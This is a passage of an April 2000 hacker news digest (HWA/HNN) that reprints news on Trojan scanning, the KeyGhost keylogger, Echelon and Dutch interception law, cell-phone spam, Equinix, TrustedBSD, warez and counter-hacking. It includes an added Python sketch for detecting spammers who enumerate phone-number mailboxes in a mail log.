Web posted at: 8:53 a.m. EDT (1253 GMT)
by Ellen Messmer
(IDG) -- ISS has developed an intrusion-detection application, code-named
Bullet, that lets e-commerce companies scan a Web site visitor's PC to see
if it is infected with Trojan horses, such as Back Orifice, or viruses that
could be passed on to the e-commerce site.
Trojan horses let intruders seize remote control of PCs, and that could mean
a compromise of an online banking system, for example, even when the correct
user identification is employed to access the site.
"Businesses are just getting fed up with the crap coming off the Internet,"
says ISS CEO Thomas Noonan, adding that one bank is expected to announce it
is using the ISS application on its home banking site this week.
The ISS application uses ActiveX technology to scan the laptop, and if
required, wipe out the unwanted, dangerous code. Noonan acknowledges that
use of the scanning application could touch off an invasion-of-privacy debate.
Further details about the application were not available. ISS has not announced
when the application will become generally available or how much it will cost.
@HWA
38.0 [HNN] Links to Web Sites Illegal
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 10th
contributed by Evil Wench
The Osaka District Court has ruled that under certain conditions
linking one web site to another would violate the law. While slightly
vague it would seem that simply linking to a site that violates the
law could be charged as aiding and abetting a crime.
Asia Biz Tech
http://www.nikkeibp.asiabiztech.com/wcs/leaf?CID
BAD URL - expired or deleted. - Ed
@HWA
39.0 [HNN] British Companies Complacent
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 10th
contributed by acopalyse
A study by the Department of Trade and Industry in Britain finds that
British businesses are too complacent when it comes to online security.
The Information Security Breaches Survey 2000 (ISBS 2000) found that
60% of companies have suffered a security breach and that 30% do not
feel they have anything worth protecting. It was also found that the
average cost of each intrusion was only £20,000. The study will be
released at Infosecurity Europe 2000 on 11 April at Olympia in London.
The UK Register
http://www.theregister.co.uk/000406-000023.html
BAD URL - expired or deleted. - Ed
@HWA
40.0 [HNN] Trio Becomes First Internet Crime Conviction for Hong Kong
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 10th
contributed by William Knowles
In the first case of its kind in Hong Kong a teenager has been
sentenced to six months in jail after pleading guilty to 49 computer
crime-related charges. Two other accomplices were sent to detention
centers. The trio got to know each other online where they traded name
and password information on various accounts. The three have been
released on bail pending an appeal.
Agence France-Presse - via Nando Times
http://www.techserver.com/noframes/story/0,2294,500189582-500255153-501302727-0,00.html
@HWA
41.0 [HNN] Census Afraid of Electronic Intrusion
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 10th
contributed by Evil Wench
While the US Census Bureau claims that it is doing everything it can
to increase responsiveness it has deliberately played down the online
option. The Census feels that they have not adequately tested the
security options of the site. So while the site is active and
available it is not being publicized. (It won't get broken into if we
don't tell anyone about it.)
Online Census Form
Industry Standard - via Yahoo
http://www.2000.census.gov/
http://dailynews.yahoo.com/h/is/20000406/bs/20000406103.html
@HWA
42.0 [HNN] Hardware Key Logger Introduced
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 10th
contributed by Weld Pond
Software to monitor every key stroke has been around for a while but
now a New Zealand company has introduced a hardware device that is
small enough to be hidden inside the keyboard that does the same
thing. The small device known as KeyGhost will monitor and record
every key stroke on the keyboard and stores all data within itself.
KeyGhost will retail for between $99 and $309.
ZD Net UK
http://www.zdnet.co.uk/news/2000/12/ns-14347.html
Tiny keyboard snooping device tracks passwords
Mon, 27 Mar 2000 11:06:12 GMT
Will Knight
Before you press the return button, check you're not bugged. Will Knight
reports.
A tiny device that can be hidden within a keyboard or a PS/2 plug and secretly
record half a million user keystrokes has been launched by New Zealand hardware
manufacturer, Working Technologies.
Unlike most surveillance technologies, 'Key Ghost' does not require any
software to be covertly installed. All data is stored directly on the device and
can be summoned by entering a "Personal Unlock Code" (PUC) through a keyboard.
The device can then be removed and the information retrieved by another computer.
The most obvious application of this technology is to capture usernames and
passwords or data that has been encrypted or otherwise protected on a machine.
Working Technologies also markets the add-on as a handy data recovery tool.
Working Technologies says the FBI uses similar technology to carry out computer
surveillance.
Key Ghost devices cost between $99 (£62) and $309 (£195).
@HWA
43.0 [HNN] Napalm Issue 4
~~~~~~~~~~~~~~~~~~~~
April 10th
contributed by Kynik
Issue 4 of Napalm has been released with articles on securing Solaris
2.x and musical intonation. (Now that's a weird mix.)
Napalm
http://napalm.firest0rm.org/
@HWA
44.0 [HNN] EU Set To Rewrite Human Rights
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 12th
contributed by g.machine
Rules and treaties originally drawn up fifty years ago to outline
basic human rights failed to anticipate advancements in technology.
Now the European Union is attempting to rewrite those rules which
would include a ban on 'systematic interception' of electronic
communications. This would essentially ban Echelon and Frenchelon.
(Why do the Europeans seem to understand privacy so much better than
US lawmakers?)
Heise
http://www.heise.de/tp/english/inhalt/co/6724/1.html
Flaw In Human Rights Uncovered
Duncan Campbell 08.04.2000
Proposals for a new definition of human rights now before the European
Parliament would ban ECHELON and update data protection rules to latest
developments in telecommunications technology.
International spying on communications should be identified as a breach
of fundamental human rights, according to proposals now before the
European Parliament. The new proposals suggest that treaties and rules
on human rights drawn up 50 years ago or more failed to anticipate how,
in the Internet age, threats to personal privacy can easily cross
international boundaries.
According to the five page proposal, all future interceptions must
"have a legal basis, be in the public interest and be strictly limited
to the achievement of the intended objective".
"Any form of systematic interception cannot be regarded as consistent
with that principle, even if the intended aim is to fight against
international crime".
"Any Member State operating such a system should cease to use it".
If implemented internationally, the new extension of human rights would
outlaw the practice of signals intelligence (sigint), except when used
to fight crime or terrorism. Sigint systems are now used by many large
countries to spy on the diplomatic, commercial and personal communications
of allies as well as enemies. The proposals are likely to be particularly
bitterly fought by the British government, whose sigint agency GCHQ
co-operates with the US National Security Agency to run the world's
largest communications intelligence system, including ECHELON.
MEPs will be asked to endorse proposals intended to eliminate cross-border
spying between European nations as well as by nations outside the Union.
The plans follow two recent parliamentary discussions about international
communications surveillance, and in particular the US-run Echelon network,
which collects phone call, fax and data communications from satellite
communications links.
According to proposals prepared by Graham Watson, chairman of the EP
Committee on Citizens' Freedoms and Rights, Justice and Home Affairs,
the existing framework of human rights is defective. They "fall short
of what the citizens of Europe are entitled to expect, since they do
not protect them from interceptions carried out by a Member State of
which they are not nationals".
"European citizens, irrespective of their nationality, are guaranteed
fundamental rights at the highest possible level", Watson asserts.
If the resolution is passed by the full Parliament at a meeting in
Strasbourg later this month, the EU's president will be told that there
is an "urgent need" for the Council "to take ... necessary diplomatic
steps to prevent third countries from carrying out any form of
interception on the territory of the Union outside the framework of
the joint fight against organised crime". The President will be asked
to commence diplomatic negotiations with the United States and other
countries "to put an end to all forms of systematic and general
espionage by third countries vis-à-vis the activities of the Member
States of the Union, its institutions and its citizens".
It adds "even in the case of the fight against cross-border crime,
adequate safeguards governing interceptions should be drawn up" and
that "any form of interception by a Member State should be notified
to the Member States on whose territory the persons whose communications
are being intercepted are present".
The resolution also expresses irritation with "the current piecemeal
nature of the relevant laws and operational and organisational
arrangements" affecting interception in Europe. The "piecemeal
arrangements" include Schengen, Europol, and the Customs Convention.
According to Watson, these entail "different standards of protection"
and are "free of any real democratic and judicial scrutiny". Six of
15 EU states had also failed to comply with the EC directives on data
protection and on the privacy of telecommunications data.
The Committee also complains that the problems have been raised in the
"numerous written and oral questions tabled on this subject over the
last two years".
The proposals follow a two day hearing on data protection and
surveillance, held in Brussels in February, and statements made to
the Parliament by the EC and Council of Ministers at the end of March.
The Citizens Rights' Committee president is also presenting the lack
of formal international communications and data privacy as a global
problem. "On a world-wide scale, the rise of the information society
has not been accompanied by a corresponding revision of provisions on
data protection by the Council of Europe, the OECD and the WTO", he
says. The proposals call for UN guidelines on personal data and OECD
guidelines on privacy to be "given the status of binding texts - at
the very least between the States of the Union and their allies".
The new proposals do not include the appointment of a special
Committee of Enquiry by the European Parliament, a proposal put forward
last month by the Green Parties and their allies. Such a committee might
have been limited to looking at breaches of existing European community
law. Instead, Watson has asked that his and two other committees be asked
to prepare, by the end of the year a new and detailed report on the
problem of data protection and interceptions.
@HWA
45.0 [HNN] Dutch Want Their Own Echelon
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 12th
contributed by root66
The Dutch Parliament is currently debating a bill that will give
increased powers to the Dutch Intelligence Agency BVD. If passed the
bill would allow the agency to intercept satellite communications at
random and search the intercepted traffic by keywords.
Heise
http://www.heise.de/tp/english/inhalt/co/6731/1.html
Echelon in Holland
Jelle van Buuren 11.04.2000
Dutch intelligence agency authorized to scan satellite communications
The Dutch Intelligence Agency BVD is getting new powers. Among other
things, the powers to intercept communications will be extended. The
agency is authorized, if the government gets its way, to intercept
satellite communications at random and search the intercepted traffic by
keywords. Also, the BVD gets a new intelligence task: the gathering of
economical information. Holland goes Echelon, it seems.
The new 'Act on the intelligence and security agencies' (WIV), which is
currently debated by Dutch parliament, gives the powers of the BVD a new
legal basis. Actually, it means mainly the extension of investigative
powers. In each amendment on the original proposal, new powers are given.
For instance, in the first draft of the new Act, the BVD got the power to
intercept, record and listen into telecommunications. In the latest
amendment, from the beginning of this year, the power to 'receive'
telecommunications was added. This means the BVD is authorized to directly
pluck telecommunications, for instance GSM-traffic, out of the air. In
this way, the BVD is no longer dependent on the willingness of telecom
operators to intercept traffic, but can create for instance their own
parallel network of receivers to intercept all GSM-traffic. Also, this
prevents providers from 'leaking' about the fine work the BVD is doing in
this area.
The biggest extension, however, is the newly added article 25a. In this
article, the BVD is authorized to intercept at random all international
telecommunication that is not cable bound and scan the intercepted
communication on items of interest (persons, groups, keywords). According
to the explanatory note by the draft Act, this kind of random interception
is needed to investigate if by any chance interesting messages are part of
the international communication.
The government says nonchalantly that it can't be prevented that in this
manner the BVD gets acquainted with the content of the intercepted
communications, although that isn't - still according to the Dutch
government - the main purpose of the random interception.
"The searching is primarily an instrument for the reconnaissance of the
communication, to try to establish the nature of the communication and
the identity of the person or organisation that is communicating. That in
this way the agency gets acquainted with a part of the content of the
communication is inevitable, in order to establish who is communicating
and if it's a person or a group that has the interest of the agency. The
searching however is not directed to get acquainted with the full content
of the communication. In a certain way, this activity is comparable with
the listening in on telephone conversations, to check if the connection
is all right."
This seems like a very creative way of saying that interception isn't
really interception, but a mere technical testing of connections. And for
that, no legal or governmental warrant is needed...
Keywords
As important parts of the international telecommunications are transmitted
by satellites and beam transmitters, it is clear this article 25a
authorises the Dutch BVD to intercept all these communications. This means
an uncontrolled authority to intercept and scan all communication that is
not cable bound. This can have a great impact on the Internet traffic. As
a message on the Internet chooses the least busy route, and the heart of
Internet lies in the United States, there is a big chance that email sent
within the Netherlands chooses an international route by satellite. In
future this can also be the case for telephone conversations. All these
messages can be intercepted and randomly searched. Even now, the phone
conversations between two big Dutch cities, Amsterdam and Rotterdam, are
being transmitted by beam transmitters.
In the first draft of the WIV, the Home secretary had to give permission
to the keywords the intelligence agency is using to scan the intercepted
traffic. In the latest amendment, the Home secretary only gets once a year
notification of the list of keywords, whereas the BVD is authorized to add
new keywords to its own discretion.
Besides that, the BVD is authorized to store all intercepted
communication. Where the first proposal of the Act stipulated that the BVD
has to destroy immediately all intercepted communication that isn't of
interest for them, the new amendment gives the BVD the right to store all
intercepted communication for a year.
In this way, the Dutch government is creating its own mini-Echelon. The
BVD uses for its interception tasks the facilities of the Technical
information processing centre (TIVC) of the Navy intelligence. This
centre, located at the Navy complex Kattenburg in Amsterdam, decodes
satellite traffic that is being intercepted by different ground stations.
The TIVC is working the same way as its big brother NSA, as showed by the
publication of internal documents in the Dutch daily De Haagse Courant in
1985. Satellite conversations were intercepted, recorded and selected by
keywords for further analysis. The intelligence the TIVC gathered was sent
to the Foreign Intelligence Service (IDB), till this unit was closed down
in 1994 after a series of scandals. Since then, all signal intelligence is
in the hands of Navy intelligence.
According to a study of two Dutch Intelligence experts (Bob de Graaff and
Cees Wiebes, Villa Maarheeze, 1998), the TIVC is part of a broader
international network and works closely with other Western agencies. For
instance in 1972, the TIVC reported to the Mossad that Egypt and Libya had
developed a telephone- and telex-connection under sea. Israeli special
forces destroyed this connection, so Egypt and Libya had to communicate
again by satellites, which were an easy target for interception. According
to the authors, the American CIA protested in 1992 firmly against the
imminent dissolution of the IDB, because they were afraid Dutch signal
intelligence capacity would diminish.
Vital economic interests
The new power to intercept satellite communications at random will
undoubtedly be used for economic espionage. In the past, the signal
intelligence capacity already served economic purposes. In the above
mentioned study of the intelligence experts, examples of this are
mentioned. The authors speak of an "incestuous relation" between the
intelligence services and Dutch industry. Leading persons of big Dutch
companies, with establishments abroad, worked for the IDB. In exchange,
they got economic intelligence gathered by the TIVC. The Dutch
multinational Philips has, according to the study, close relations with
Dutch intelligence. The company installed interception devices in
telephone centres it sold to foreign companies and governments, the report
says.
In the proposed new 'Act on the intelligence and security services', the
BVD gets officially the task of economic intelligence gathering. The BVD
has to "protect vital economic interests", which is seen as a part of the
national security.
"The Dutch economy is highly dependent on economic developments in the
world; these developments are characterised by increasing
internationalisation and globalisation. Decisions taken elsewhere, can
have a sincere impact on the Dutch economy. It is possible to gather
intelligence on these developments in different ways, for instance by
cooperation with intelligence agencies of other countries. These agencies
however, will take into account their own interests. In order not to be
dependent on information of third parties, the government thinks it is
necessary to build up its own information position and enforce it."
What exactly 'vital economic interests' are, is however wrapped in a
cloud of mystery.
"To end with, we remark that with the explicitation of 'vital economic
interests of the Netherlands' in the terms of reference of the BVD, also
the possibility is created - if it seems appropriate - to conduct
investigations in this area, where national security as such isn't in
danger or is difficult to argue for."
Encryption
The new powers of the BVD are also interesting because some articles are
related to cryptography and information technology. The BVD is authorized
to break into homes and offices to bug keyboards. Besides that, the BVD is
authorized to break into computers and steal, alter or delete information
that is stored in computers. In other words, the BVD is allowed to hack.
In this way, the intelligence agency can steal data from computers,
manipulate software, corrupt passwords or install a Trojan Horse, so
access is secured and cryptography can be bypassed.
Cryptography is a topic of special interest for the BVD. In the draft Act,
the power to undo encryption is being extended. In the first proposal the
BVD got the authority to decrypt encrypted communication and data "by
technical means". In the latest amendment this is extended to decryption
"by all possible means". According to the explanatory note, "practice has
shown there are other ways than just technical means to decrypt encrypted
communications."
This cryptic description seems to be directed at infiltrators who diddle
out passwords, or look over the shoulder when messages are encrypted, or
intelligence teams breaking into homes and offices in search of the little
piece of paper the password is written on.
The articles on the interception of telecommunication also contain remarks
on cryptography. Encrypted messages may be kept in storage as long as is
necessary for the BVD to decrypt them. The explanatory note says:
"Where telecommunication is concerned, of which the encryption is not
undone, and where the mere fact that cryptography has been used makes
this communication interesting for the agency, it is desirable to save
this communication to the moment the capacity exists or is being
developed to decrypt the communication."
So the use of a perfectly normal technique to protect one's privacy, trade
secrets or sensitive political information, is in the eyes of the Dutch
government a highly suspect act.
The draft Act also introduces the obligation for "every one" the
authorities believe has access to the keys, to cooperate with the
intelligence agency in decrypting the encryption. Refusal is punishable
with a sentence of two years. The Dutch parliament has asked the
government if this means that suspects also are obliged to hand over the
keys.
The answer is not available yet. But if the government confirms this
obligation also applies to suspects, this will be a clear violation of the
fundamental human rights, as stated for instance in the Treaty on the
protection of the Human Rights and Fundamental Freedoms. It means an
obligation to cooperate on your own condemnation and the reversal of the
burden of proof.
@HWA
46.0 [HNN] SPAM Goes Wireless
~~~~~~~~~~~~~~~~~~~~~~~~
April 12th
contributed by Evil Wench
Unsolicited commercial email is finding new ways of interrupting our
lives with their unwanted and unwelcome messages. Companies are now
using wireless messaging services to page people with advertisements
for their products. The company responsible for the SPAM, plugout.com,
said that it was only a one time occurrence and will never happen
again. (That's one time too many, if everyone did it one time...)
Washington Post
http://www.washingtonpost.com/wp-dyn/business/A51301-2000Apr10.html
'Spammers' New Calling: Cell Phones
By Mike Musgrove Washington Post Staff Writer Tuesday, April 11, 2000;
Page E01
Mike Malarkey, a business-development manager for the District-based
educational Web developer Blackboard Inc., was in the middle of a meeting
last Thursday when his Nokia cell phone chirped, sounding a bit like the
low-battery warning.
When he checked it after the meeting, he saw that the battery was fine,
but he'd just received a text message on the phone's screen--an
advertisement for a Web site selling cell-phone accessories.
"I'm just surprised that it's progressed to phones," said Malarkey. He was
one of the first recipients of an apparently novel kind of unsolicited
electronic advertising, or "spam," sent via the text-messaging service on
his ATT Wireless phone.
Another ATT customer, Laurie Ann Ryan, a public relations director who
asked that her firm not be identified, was infuriated to receive the same
message last Thursday: "Clearly the sender knows it's going to interrupt
somebody's day." She called the ad "excessively aggressive and invasive"
because a cell phone is something users tend to carry with them all
day--unlike the personal computers that e-mail spammers have targeted for
years.
One veteran of the long-running fight against spammers said this abuse of
ATT's system should come as no surprise. "I expect to see more of it
unless this kind of thing is controlled," said Nick Nicholas, an
"evangelist" at the Mail Abuse Prevention System, an organization that
tries to get Internet providers to cut off spammers' access.
Nicholas noted ATT Wireless's configuration of its text-message system as
a possible vulnerability: Its customers automatically get an e-mail
address consisting of their phone number followed by "@mobile.att.net."
"Because of the way ATT sets up the e-mail account, all you need to do is
just try consecutive numbers," he said. Nicholas said ATT should have been
able to detect this "war dialing" approach and block the spammers' access.
ATT spokeswoman Alexa Graf hadn't heard of Plugout.com's unsolicited
transmission until a reporter called yesterday afternoon. "The last thing
we want to do is start spamming our customers," she said.
The text messaging service is an included feature with ATT's service;
customers are not billed for incoming text messages. Sprint PCS offers a
similar service, while Verizon Wireless (formerly Bell Atlantic Mobile),
Nextel and Cellular One charge extra for the ability to receive text
alerts.
A spokesman for Sprint PCS reported no spamming incidents and said, "We
have software that can detect a spam and is designed to prevent it from
happening."
The company behind the ad, Plugout.com, is a Fort Lee, N.J.-based
operation whose site has only been fully operational since February.
Rudy Temiz, the company's 22-year-old president, said yesterday afternoon
that he didn't plan to repeat the exercise but expressed no remorse
either, saying that the marketing technique had generated "quite a few"
sales.
"One of the reasons we're doing this," said Temiz, "is because every
single dot-com company isn't graced with venture capital and all us
smaller Web sites have to find more creative ways to get on the map." He
didn't reveal how many messages had been sent out or how he had obtained
his list of phone numbers but said, "We're only doing it one time. Nobody
in Washington, D.C., should ever hear from us again."
Nicholas, the anti-spammer, called Temiz's marketing, "more ignorance than
anything, ignorance of the economics of the Internet or of the culture of
the Internet."
Vincent Zahn, Plugout.com's director of strategy, further defended the
text ads. "What better way to reach your target market?" he asked, saying,
"We look at it as if we're doing these people a favor if they're looking
for these kinds of products."
Responded ATT customer Ryan, "They're not doing me any favors by
soliciting me over my cell phone."
© 2000 The Washington Post Company
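The consecutive-number approach Nicholas describes leaves a recognisable pattern in a mail gateway's recipient log, which is what a carrier would look for in order to block it. The sketch below is an added example, not part of the Washington Post article or of HWA's text; the log format, client IP addresses and phone numbers are constructed for illustration, and only the "@mobile.att.net" suffix comes from the article.

```python
import re
from collections import defaultdict

GATEWAY_DOMAIN = "mobile.att.net"  # address suffix named in the article

# Assumed (hypothetical) log format: "<time> client=<ip> rcpt=<address>"
LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+client=(?P<client>\S+)\s+"
    r"rcpt=<(?P<local>\d{10})@(?P<domain>[^>]+)>$"
)

# Constructed sample log, not real traffic. 192.0.2.10 walks a number block
# out of order, skips one number and repeats another; 198.51.100.7 is an
# ordinary sender that happens to message two adjacent numbers.
SAMPLE_LOG = """\
2000-04-06T10:00:01 client=192.0.2.10 rcpt=<2025550103@mobile.att.net>
2000-04-06T10:00:01 client=192.0.2.10 rcpt=<2025550100@mobile.att.net>
2000-04-06T10:00:02 client=198.51.100.7 rcpt=<2025550142@mobile.att.net>
2000-04-06T10:00:02 client=192.0.2.10 rcpt=<2025550101@mobile.att.net>
2000-04-06T10:00:03 client=192.0.2.10 rcpt=<2025550102@mobile.att.net>
2000-04-06T10:00:03 client=203.0.113.5 rcpt=<alice@example.org>
2000-04-06T10:00:04 client=192.0.2.10 rcpt=<2025550105@mobile.att.net>
2000-04-06T10:00:04 client=198.51.100.7 rcpt=<2025550143@mobile.att.net>
2000-04-06T10:00:05 client=192.0.2.10 rcpt=<2025550106@mobile.att.net>
this line is malformed and must be skipped
2000-04-06T10:00:06 client=192.0.2.10 rcpt=<2025550107@mobile.att.net>
2000-04-06T10:00:07 client=192.0.2.10 rcpt=<2025550100@mobile.att.net>
2000-04-06T10:09:30 client=198.51.100.7 rcpt=<3015550188@mobile.att.net>
"""


def parse_recipients(log_text, domain=GATEWAY_DOMAIN):
    """Return {client_ip: set of phone numbers} addressed at the gateway domain."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m or m.group("domain").lower() != domain:
            continue  # malformed line, non-numeric recipient or other domain
        seen[m.group("client")].add(int(m.group("local")))
    return seen


def longest_run(numbers, max_gap=2):
    """Longest run of numbers whose sorted neighbours differ by <= max_gap.

    Returns (length, first, last). Sorting makes the check independent of
    delivery order; max_gap tolerates numbers the sender skipped.
    """
    best = (0, None, None)
    run_start = prev = None
    run_len = 0
    for n in sorted(numbers):
        if prev is not None and n - prev <= max_gap:
            run_len += 1
        else:
            run_start, run_len = n, 1
        if run_len > best[0]:
            best = (run_len, run_start, n)
        prev = n
    return best


def find_enumerators(log_text, min_run=5, max_gap=2):
    """Flag clients whose recipients include a long near-consecutive run."""
    findings = {}
    for client, numbers in parse_recipients(log_text).items():
        length, first, last = longest_run(numbers, max_gap)
        if length >= min_run:
            findings[client] = {
                "run": length,
                "first": first,
                "last": last,
                "recipients": len(numbers),
            }
    return findings


if __name__ == "__main__":
    for client, info in find_enumerators(SAMPLE_LOG).items():
        print(client, info)
```

In a live gateway the same check would be applied per time window, so that a long-lived sender is not flagged for numbers accumulated over months.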
@HWA
47.0 [HNN] Forget Fort Knox Now It's Fort Net
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 12th
contributed by Code Kid
Redwood City, California-based Equinix has just opened its bomb proof
Net shelter. The shelter is said to be more secure than Fort Knox to
protect the servers of third party companies housed inside. The
compound includes geometric hand-scanners, automated mantrap and other
fancy security devices. Equinix has already built two such shelters on
the East Coast and plans on 26 more throughout the county. (While
Equinix may have the physical security they do not provide any
Internet security. Doh!)
Wired
Reuters - via Yahoo
Equinix
http://www.wired.com/news/technology/0,1282,35550,00.html
http://dailynews.yahoo.com/h/nm/20000411/wr/tech_security_1.html
http://www.equinix.com
Wired:
Net Fort Opens to Mixed Reviews
by Lynn Burke 3:00 a.m. Apr. 12, 2000 PDT SAN JOSE, California -- The
opening of the new bomb-proof Internet shelter here Tuesday was a bit like
a Mafia wedding that couldn't decide whether it wanted to be top-secret or
front-page news. In the end, it ended up being neither.
The shelter, operated by Redwood City, California-based Equinix, is billed
by its owners as a Fort Knox-like bunker that will protect the very
infrastructure of the companies fueling the electronic economy of the
United States.
Unfortunately for Equinix, the San Francisco Chronicle plastered the
top-secret location of the facility on its front page Tuesday morning. But
even if the unmarked shelter is no longer such a secret, the sprawling
compound -- chock-full of fancy security devices including geometric
hand-scanners and automated mantraps -- does appear capable of protecting
the computers housed inside from physical attack.
But is the Internet under threat of such assault? Former National Security
Advisor Mike McConnell sure thinks so.
"Look at the World Trade Center bombing," he said. "The purpose of that
attack was to collapse Wall Street. If I'm the blind sheik (accused in the
attack), I say, 'Well, that didn't work.'"
Going after the bank is no longer a worthwhile strategy, he said. Now you
go after the bank's computers.
"If you're measuring e-commerce in billions and trillions," he said, "what
Equinix has provided here, in my view, is an absolute must."
Benchmark Capital analyst Andy Rachleff, whose company helped to pony up a
good chunk of the $80 million secured for second-round financing, says
Equinix has hopped in front of a security trend in e-business.
"This is monstrous," he said. "If you're going to put your business on the
Internet, you're going to put your servers in a facility like this."
The building, a renovated version of a former IBM facility, was rebuilt by
Bechtel Corporation, the brawn behind the Hong Kong International Airport
and Boston's Ted Williams Tunnel. Bechtel has entered into a $1.2 billion
contract to build 26 more of these hosting facilities. The company has
already built two on the East Coast -- in Virginia and New Jersey.
Jeff Thompson, a software developer for operating systems security
platforms provider Argus Systems, says sinking a bunch of capital into
this kind of facility is crazy.
The security industry isn't focused on external threats, he says.
"It's so much easier to break in over the public network," he said. "The
real problem is how easy it is to attack a system on a public network."
Indeed, the denial-of-service attacks earlier this year on several of the
Internet's biggest players were all electronically perpetrated over the
Internet itself. And Equinix officials say their facility won't prevent
those kinds of attacks.
"That's something our customers need to work out themselves," said vice
president of sales Peter Ferris.
There's little doubt that the industry is worried about security, physical
or otherwise.
According to a recent survey of Fortune 1000 corporate security
professionals by security corporation Pinkerton, the potential threat to
Internet sites and computer networks was identified as the industry's
second-biggest security concern.
A recent survey from the Computer Security Institute and the San Francisco
Federal Bureau of Investigation's Computer Intrusion Squad found that 90
percent of respondents -- primarily large corporations and government
agencies -- detected computer security breaches within the last 12 months.
While no one knows whether a campaign of terror against the Internet is in
the works or not, it may just be that a facility like Equinix's provides a
little extra measure of comfort in an industry that is defined by
volatility.
Bobby Robertson, a business developer with broadband provider Enron, said
Equinix has taken security to a whole new level, and has come up with the
most sophisticated hosting service he's ever seen.
"It's reassuring, for sure," he said. "I think security is very important,
and this is a very thoughtful approach."
Yahoo:
SORRY!
Url expired (see how badly we need news gatherers!!!!? - email me if you
want to help collecting articles! tnx cruciphux@dok.org - Ed)
@HWA
48.0 [HNN] TrustedBSD Announced
~~~~~~~~~~~~~~~~~~~~~~~~~~
April 12th
contributed by tricky deamon
It seems the BSD family has a new member, TrustedBSD. TrustedBSD
provides a set of trusted operating system extensions to the FreeBSD
operating system, targeting the Orange Book B1 evaluation criteria.
TrustedBSD
http://www.trustedbsd.org/
@HWA
49.0 [HNN] 690,000 Illegal Web Pages on the Net
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 12th
contributed by Evil Wench
Speaking in Sydney, Australia last week, the president of the Business
Software Alliance, Mr Robert Holleyman, said there were at least
690,000 warez, appz and crackz Web pages on the Internet. (690,000?
Who went around and counted them all? By the time they finished half
of them were probably down.)
Sydney Morning Herald
http://www.smh.com.au/news/0004/11/text/bizcom04.html
Pirates display their booty on the isle of Zed
Date: 11/04/00
By PETER GOTTING
If you thought X-rated was bad, just wait till you see the Zs.
On the dark side of the Internet, the letter Z is used to pluralise almost
anything that is illegal.
Thus, warez, appz or filez refer to pirated software, computer games,
music and film downloads; serialz are software serial numbers and
passwordz are passwords that allow free entry to subscription-based
pornography sites.
For years, Internet users have swapped warez online. Those in the know can
easily find a free copy of applications such as Windows 2000, Adobe
Photoshop and Corel Draw; computer games such as Quake 3, KingPin and
Soldier of Fortune; and even movies such as Scream 3, Star Wars and Green
Mile. On a serialz page you can retrieve serial numbers for anything from
first aid computer programs to multimedia software.
And throughout the sitez are banners advertising pornography and links to
pages listing passwords to XXX material.
"The best illegal downloads" one site advertises; "Illegal MP3 arena"
another calls itself; "100% Illegal Pirated O-Day" one boasts.
The sites are nothing new, but copyright owners are getting scared. With
technological developments set to make it much easier to break the law -
broadband will reduce download times dramatically - software companies are
concerned.
Speaking in Sydney last week, the president of the Business Software
Alliance, Mr Robert Holleyman, said there were at least 690,000 warez,
appz and crackz Web pages on the Internet.
The Business Software Alliance - an international industry body
representing software companies such as Microsoft, Lotus, Adobe, Novell
and Symantec - estimates Internet piracy now involves more than $US1
billion ($1.67 billion) worth of software worldwide.
Mr Jim Macnamara, chairman of the alliance's local counterpart, the
Business Software Association of Australia, said technological
developments such as broadband and faster modems would aggravate the
problem.
"It's all necessary for the e-commerce revolution to happen," Mr Macnamara
said. "But, equally, we are concerned because illegal software will be
easier to access."
The sites are not hidden but quite blatant, Mr Macnamara said.
"They are quite unashamed. They do not do anything else. They openly boast
of what they have got on them."
A disclaimer on one site warns: "If you are affiliated with any
government, anti-piracy group or any other related group, or were formerly
a worker of one, you CANNOT enter this Web site, cannot access any of its
files and you cannot view any of the HTML files."
The sites say that threats against Internet service providers or
prosecutions of people affiliated with the page would breach the US
Internet Privacy Act.
Mr Macnamara suggested Internet service providers should be required to
compile contact details of Web site owners which would be available to
police but not the public.
"Individual privacy should be protected but the hosts of sites should be
required to keep a record of who owns that site," he said.
"If you get a court order you should be able to locate who is doing that
and press charges.
"Often we do not even know where they are because there's no records
kept."
But the organiser of hackers group 2600 Australia, Mr Grant Bayley, said
most of the sites were hosted on free Web page hosting sites such as
Geocities and Angelfire, rather than through ISPs.
"A change in law won't achieve any of their objectives," he said.
Mr Bayley said 2600 did not condone any of the sites. Hackers were
interested in computer security and not breaking the law; crackers access
software illegally.
"The number of sites alleged to exist seems grossly exaggerated," he said.
But Mr Bayley suggested software companies should provide more programs to
consumers on a free trial basis.
"It's a problem of not offering enough of a sample," he said.
"People operating such sites are often under the age of 18 and do so more
out of interest in a product than a desire for professional gain. These
are people wanting to try out the software."
This material is subject to copyright and any unauthorised use, copying or
mirroring is prohibited.
(We disregard all such notices, news is in the public domain, we don't
charge for access to these archives, if anything we're doing the site(s)
a favour by disseminating their news. Legal action will result in a civil
disobedience action and will incur underground continuance of our zine.
- Ed)
@HWA
50.0 [HNN] Attacking the Attackers
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 12th
contributed by Evil Wench
Just how legal is it to launch a counterattack against an online
attacker? Would you be committing just as big a crime as they are? How
can you be sure you are counterattacking the correct target? Should
laws be passed to legalize hostile responses?
CNN
http://www.cnn.com/2000/TECH/computing/04/07/self-defense.idg/index.html
Can you counter-attack hackers?
April 7, 2000 Web posted at: 10:17 a.m. EDT (1417 GMT)
by Winn Schwartau
(IDG) -- You are running a Web site. Making money perhaps, and visitors
are seeing your message. Then, according to your perimeter
intrusion-detection device, some online goofball or criminal hacker is
beating on your door. What are you going to do?
In September 1998, the Pentagon reacted to a browser-based
denial-of-service attack by the hacktivists Electronic Disruption Theater
by using offensive applets to shut down the attacking browsers. Clean.
Quick. Effective. But the Pentagon lawyers went ballistic within minutes.
The techies defending the Pentagon servers had broken too many laws to
enumerate - including a military prime directive, "posse comitatus," which
forbids the military from taking unilateral actions within the U.S. and
against U.S. citizens.
